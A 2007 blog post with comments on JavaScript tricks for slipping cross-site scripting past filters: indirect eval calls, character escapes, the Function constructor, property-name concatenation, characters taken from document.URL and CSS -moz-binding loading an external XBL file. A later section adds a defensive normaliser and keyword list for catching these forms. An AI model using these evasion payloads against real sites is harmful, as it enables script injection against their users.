Javascript for hackers
Wednesday, 19 September 2007
I’ve spent a bit of time experimenting with Javascript over the last few weeks and I thought I’d share some of the techniques used. First of all, Javascript is a weird, cool and surprising language; it is simply not possible to learn everything it can do.
Most of these techniques were used whilst hacking/playing with the PHPIDS and I got addicted to finding new ways of doing things. I’ve followed a question and answer format for this post as I think it is easier to follow rather than one big post of techniques.
What can you do if you can’t use eval()?
In Javascript you can store references to native functions in variables, so for example you can do the following:-
x=eval;
x();// calls eval
Gecko-based browsers also allow you to call the eval function like this:-
0['eval']('alert(/XSS/)')
So you can do stuff like, use your imagination:-
0['ev'+'al']('alert(/XSS/)');
How do I get round using certain characters/words?
Javascript supports various encodings which allow you to represent different characters. So the following unicode example creates the eval and alert combination:-
alert('\141\154\145\162\164\050\061\051')
So \141 translates to ‘a’ and so on. When you have a string in Javascript (delimited by "" or ''), you can use unicode characters: when Javascript encounters the ‘\’ it will convert the character depending on its character code.
Hexadecimal encoding can also be used, like the following:-
alertString = 'a\x6cert(1)';
You can also use eval to convert the character for you, for example the following produces the letter ‘a’:-
charNumber = 141;
stringQuote = "'";
backslash = "\\";
alert(eval(stringQuote + backslash + charNumber + stringQuote));
How do you call anonymous functions?
Javascript allows you to call functions when you use ‘()’ as you already know, but you can also use it to call anonymous functions like the following:-
new Function('alert(1)')();
The code above creates a new anonymous function and passes the string ‘alert(1)’, which is embedded into the newly created function; it then executes the function. You can also combine the techniques mentioned, like using different character encodings to pass the string information. You also don’t need to specify ‘new’, e.g.
Function('a\x6cert(1)')();
What can you use as variable names?
Javascript isn’t very strict and is pretty lax when it comes to variable names: for example the ‘_’ character is allowed as a variable name, or even a ‘$’ can be used as a variable name, and even different character sets are allowed for variable names.
How can you create a string?
Strings are defined using String(), '' and "" etc. What you might not have known though is that regular expressions can also be used to create a string, like the following examples:-
newString = /XSS/.source;
newString = /XSS/ + '';
newString = newString[1] + newString[2] + newString[3];
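The sections above on character encodings, the Function constructor and regular expressions as strings all describe the same problem from the filter's side: a blocklist that looks for the literal words eval or alert never sees them. As an added example, not code from the original post or from PHPIDS, here is a small normaliser that undoes those three transformations (string escapes, concatenated literals, RegExp.source) before matching, and compares what a raw match and a normalised match each find. The sample inputs, the keyword list and all function names are constructed for this illustration.

```javascript
// Added example, not code from the original post: a normaliser that shows why a
// keyword blocklist has to undo string escapes, concatenated literals and
// RegExp.source before matching. Sample inputs below are constructed.

// Decode the string escapes the post describes: octal (\141), hex (\x6c),
// unicode (\u0061) and the single-character escapes JavaScript recognises.
function decodeJsEscapes(src) {
  return src.replace(
    /\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[0-7]{1,3}|.)/g,
    function (match, esc) {
      if ((esc[0] === 'x' || esc[0] === 'u') && esc.length > 1) {
        return String.fromCharCode(parseInt(esc.slice(1), 16));
      }
      if (/^[0-7]/.test(esc)) {
        return String.fromCharCode(parseInt(esc, 8));
      }
      var simple = { n: '\n', t: '\t', r: '\r', b: '\b', f: '\f', v: '\v' };
      return simple.hasOwnProperty(esc) ? simple[esc] : esc; // \' \" \\ keep the char
    }
  );
}

// Fold 'ev' + 'al' into 'eval'. Repeats until stable so chains of three or more
// literals collapse too. The result is for matching only (quote types are not
// re-escaped), never for re-execution.
var CONCAT = /(['"])((?:\\.|(?!\1)[^\\\n])*)\1\s*\+\s*(['"])((?:\\.|(?!\3)[^\\\n])*)\3/g;
function foldConcatenation(src) {
  var prev;
  do {
    prev = src;
    src = src.replace(CONCAT, function (m, q1, a, q2, b) { return q1 + a + b + q1; });
  } while (src !== prev);
  return src;
}

// Rewrite /XSS/.source as the string literal 'XSS' it evaluates to.
// (/XSS/ + '' would give '/XSS/', slashes included, and is not handled here.)
var REGEX_SOURCE = /\/((?:\\.|[^\\\/\n])+)\/[gim]*\.source/g;
function foldRegexSource(src) {
  return src.replace(REGEX_SOURCE, "'$1'");
}

// Fold until nothing changes, then decode escapes exactly once (decoding in the
// loop would turn an escaped backslash into a second round of decoding).
function normalise(src) {
  var prev;
  do {
    prev = src;
    src = foldRegexSource(foldConcatenation(src));
  } while (src !== prev);
  return decodeJsEscapes(src);
}

// Constructed keyword list; a real filter would use a much larger one.
var KEYWORDS = ['eval', 'alert', 'Function'];
function findKeywords(src) {
  return KEYWORDS.filter(function (k) { return src.indexOf(k) !== -1; });
}

// Compare what a naive filter sees with what the browser will actually run.
function analyse(src) {
  var normalised = normalise(src);
  return { normalised: normalised, rawHits: findKeywords(src), normalisedHits: findKeywords(normalised) };
}

// Constructed samples built only from the forms shown in the post and comments.
var SAMPLES = [
  "0['ev'+'al']('a\\x6cert(1)')",
  "Function('\\141\\154\\145\\162\\164(1)')()",
  "[]['eva'+'l'](/alert(1)/.source)",
  "var total = price + tax;"
];

SAMPLES.forEach(function (s) {
  var r = analyse(s);
  console.log(JSON.stringify(s), '->', JSON.stringify(r.normalised),
              '| raw:', r.rawHits.join(',') || '-',
              '| normalised:', r.normalisedHits.join(',') || '-');
});
```

Run it with node. The first sample matches nothing on the raw text and both eval and alert after normalisation; the benign last sample matches nothing either way. The folding is deliberately a set of regular expressions rather than a parser, so it is a demonstration of the principle (normalise first, then match), not a drop-in filter.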
I really need this character but it’s not allowed, how do I get it?
Think around the problem: rather than trying to access the character directly, get the information from another source. For example, say you wanted the colon character and you had tried URL encodings and various character encodings; you can use the URL property to gain this information. Example:-
alert(document.URL.substr(4, 1));
I like the document.URL technique, what else is possible using similar techniques?
Surprisingly, you often don’t even need to call the document object to access some functions, so URL is available within the context of the HTML element:-
Test
In Internet Explorer you can even set the URL property to cause XSS like this:-
Test
Are there any other ways of executing javascript in CSS?
Firefox has a few features which allow unusual Javascript execution, among them is the -moz-binding css extension which allows you to link XML documents using CSS. Here is an example:-
<p style=-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss);>Test</p>
How can I use XML within Javascript?
Firefox now supports XML in Javascript code; you can just include the tags like this:-
testXML = <xml>Test XML string</xml>; // E4X XML literal; the element name here is assumed
alert(testXML.text());
No. 1 — September 20th, 2007 at 1:13 am
I’d like to point out a few things.
First, there’s another way you can call an anonymous function:
(function() {
alert(1);
})();
Second, Gecko-based browsers have eval attached to all objects. This basically means you can call eval anywhere. Numbers (like the example you’ve provided), strings, regular expressions, arrays, and, ultimately, objects.
This can result in all sorts of syntactically bizarre examples:
(6)['e' + 'val']('alert(/XSS/)');
/blah/['ev' + 'al']('alert(/XSS/)');
[]['eva' + 'l']('alert(/XSS/)');
({})['eval']('alert(/XSS/)');
Third, XML support in JavaScript code is called E4X (ECMAScript for XML).
No. 2 — September 20th, 2007 at 7:21 am
Hi kourge
Thanks for the good points
No. 3 — September 23rd, 2007 at 5:27 am
This is the good stuff… 🙂
Cool tricks, you should start a new XSS sheet with them.
No. 4 — September 23rd, 2007 at 5:38 pm
Thanks Ronald
I prefer posts really, cheatsheets are good but I like to write a bit of an explanation so it’s accessible to more people.
No. 5 — October 2nd, 2007 at 12:39 am
thanks for the tips.
No. 6 — October 2nd, 2007 at 1:50 am
Good. Thanks.
I think the encoding thing is not a surprising one.
>>>Are there any other ways of executing javascript in CSS?
You mean, we can write the javascript in a css file and we have to link that css file by using -moz-binding???
Can you show me more information about that?
Thanks.
No. 7 — October 2nd, 2007 at 8:18 am
@Michael
In the example provided Javascript is executed by linking to an XML file:-
<p style=-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss);>Test</p>
You can view the source of the XML here:-
http://www.businessinfo.co.uk/labs/xbl/xbl.xml
Cheers
No. 8 — October 15th, 2007 at 12:39 pm
These are awesome. I especially like the (6)['e' + 'val']('alert(/XSS/)');
^ So much win right there.
It looks like all you need to hack is to just get into a script tag.
No. 9 — October 15th, 2007 at 1:07 pm
If you like that…check out the XML stuff I’ve been working on:-
http://www.thespanner.co.uk/2007/10/09/injecting-the-script-tag-into-xml/
😀
No. 10 — November 16th, 2007 at 3:54 pm
Look this
http://iframe.in/howto/javascript-into-css/
The essence of the method is perfectly visible in the first example; it’s for IExplore. The second example demonstrates JavaScript in CSS via XBL; it works only on Firefox.
No. 11 — November 16th, 2007 at 4:09 pm
@Jacky
Thanks for the link I was aware of all those issues but someone else who reads my blog might not. Thanks again 🙂
No. 12 — November 18th, 2007 at 5:39 pm
This is a good job.
Cool tips, you should start a new XSS sheet with them.
No. 13 — November 18th, 2007 at 5:54 pm
Thanks. Well, actually I’ve created a hacking utility that will include advanced XSS and filter evasion tags, which is like an interactive cheatsheet:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php
No. 14 — November 19th, 2007 at 12:15 am
Is there anything like this that works with IE 7?
<p style=-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss);>Test</p>
No. 15 — November 19th, 2007 at 9:03 am
Hi Peter
Yep you can use expression in IE7, Martin has a great article here:-
http://the-mice.co.uk/switch/?p=39
The article shows a combined Firefox and IE way of inserting code into the style attribute. Hope it helps.
No. 16 — February 21st, 2008 at 4:57 pm
anyone know how to fire off a javascript function using a URL?
I have a webpage which has a few javascript functions associated with it to do different things. Now I want to know if it is possible to provide a link to the page and invoke one of these functions with parameters. can this be done?
let’s say the site is http://www.blahblahblah.com/simplepage.html
and the function is called myTestFunction(number)
I can set up links on the simplepage.html file using a href’s with the link javascript:myTestFunction(1) for example, but how would I do this in one fell swoop, letting someone go directly to the function without clicking on the link on the page?
Cheers